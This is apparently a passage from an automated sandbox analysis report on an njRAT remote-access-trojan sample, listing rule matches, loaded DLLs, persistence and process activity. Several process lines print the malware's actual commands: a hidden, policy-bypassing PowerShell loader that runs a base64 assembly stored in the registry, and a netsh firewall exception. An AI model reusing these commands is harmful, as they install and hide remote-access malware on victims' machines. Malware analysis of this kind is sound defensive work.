        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C330712_2_003C3307
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003AE06012_2_003AE060
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B414012_2_003B4140
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C234512_2_003C2345
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0042046512_2_00420465
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003D645212_2_003D6452
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003D25AE12_2_003D25AE
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C277A12_2_003C277A
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B684112_2_003B6841
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003FE92812_2_003FE928
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003D890F12_2_003D890F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B896812_2_003B8968
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040893212_2_00408932
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003D69C412_2_003D69C4
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003CCCA112_2_003CCCA1
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003D6F3612_2_003D6F36
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B70FE12_2_003B70FE
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B319012_2_003B3190
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003A128712_2_003A1287
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003CF35912_2_003CF359
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C160412_2_003C1604
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B568012_2_003B5680
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C781312_2_003C7813
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003B58C012_2_003B58C0
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C1AF812_2_003C1AF8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003CDAF512_2_003CDAF5
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003D9C3512_2_003D9C35
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00427E0D12_2_00427E0D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003AFE4012_2_003AFE40
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003CBF2612_2_003CBF26
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C1F1012_2_003C1F10
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: String function: 003C8A80 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: String function: 00AE0C63 appears 70 times
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: String function: 003C0C63 appears 70 times
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: String function: 00AC7F41 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: String function: 003A7F41 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: String function: 00AE8A80 appears 42 times
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: String function: 004115D7 appears 36 times
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: String function: 00416C70 appears 39 times
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: String function: 00445AE0 appears 65 times
        Source: ._cache_1.exe, 00000000.00000003.341152495.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs ._cache_1.exe
        Source: ._cache_1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
        Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
        Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.csCryptographic APIs: 'CreateDecryptor'
        Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.csCryptographic APIs: 'CreateDecryptor'
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.csCryptographic APIs: 'CreateDecryptor'
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.csCryptographic APIs: 'CreateDecryptor'
        Source: classification engineClassification label: mal100.phis.troj.evad.winEXE@14/16@28/1
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B184F3 AdjustTokenPrivileges,CloseHandle,1_2_00B184F3
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B18AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00B18AA3
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003F84F3 AdjustTokenPrivileges,CloseHandle,12_2_003F84F3
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003F8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_003F8AA3
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0046E48D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046E48D
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
        Source: C:\Users\user\Desktop\._cache_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnkJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\5cd8f17f4086744065eb0992a09e05a2
        Source: C:\Users\user\Desktop\._cache_1.exeFile created: C:\Users\user\AppData\Local\Temp\aut512C.tmpJump to behavior
        Source: ._cache_1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\._cache_1.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: ._cache_1.exeReversingLabs: Detection: 80%
        Source: ._cache_1.exeVirustotal: Detection: 68%
        Source: C:\Users\user\Desktop\._cache_1.exeFile read: C:\Users\user\Desktop\._cache_1.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe"
        Source: C:\Users\user\Desktop\._cache_1.exeProcess created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
        Source: C:\Users\user\Desktop\._cache_1.exeProcess created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLEJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: devrtl.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: credui.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: odbc32.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpqec.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: qutil.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: ws2help.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: nci.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: devrtl.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: napmontr.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: certcli.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: ndfapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wdi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: tdh.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wlanutil.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: p2pcollab.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: wlanhlp.dllJump to behavior
